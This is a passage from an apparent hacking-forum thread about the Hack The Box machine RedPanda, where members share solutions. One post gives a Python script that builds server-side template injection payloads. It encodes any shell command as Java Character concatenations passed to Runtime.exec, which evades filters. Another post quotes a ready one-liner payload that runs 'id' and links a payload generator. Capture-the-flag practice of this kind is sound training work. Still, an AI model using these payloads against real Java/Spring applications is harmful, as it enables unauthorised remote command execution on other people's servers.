Return to forum
RedPanda - HTB [Discussion]
by - Thursday, January 1, 1970 at 12:00 AM
Member
Member
Posts: 12
Threads: 0
Joined: N/A
Reputation: 0

#71
July 15, 2022 at 1:36 PM
Amusing that Gato and Syn had identical solutions! Perhaps study a little on XXE injection techniques before attempting root.

Here's a short script to produce the SSTI queries:

#! /bin/python3

command = input('Enter command:')

def injection(comm):
    build = "*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime()"
    first_ascii = str(ord(comm[0]))
    build += ".exec(T(java.lang.Character).toString(" + first_ascii + ")"
    comm = comm[1:]

    for letter in comm:
        letter_ascii = str(ord(letter))
        build += ".concat(T(java.lang.Character).toString(" + letter_ascii + "))"

    build += ").getInputStream())}"

    return build

print(injection(command))
Reply
Member
Member
Posts: 3
Threads: 0
Joined: N/A
Reputation: 0

#72
August 13, 2022 at 3:57 AM
(July 10, 2022, 06:26 AM)Exa Wrote:
(July 9, 2022, 08:40 PM)yumi Wrote: https://github.com/VikasVarshney/ssti-payload


Based off of this script, I created this one-liner (needs to be URL encoded):
 

*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}


What clued you in initially to looking at exploiting JAVA?
Reply
Banned
Posts: 5
Threads: 0
Joined: N/A
Reputation: 0

#73
September 5, 2022 at 12:23 AM
Interesting
Reply


 Users viewing this thread: RedPanda - HTB [Discussion]: No users currently viewing.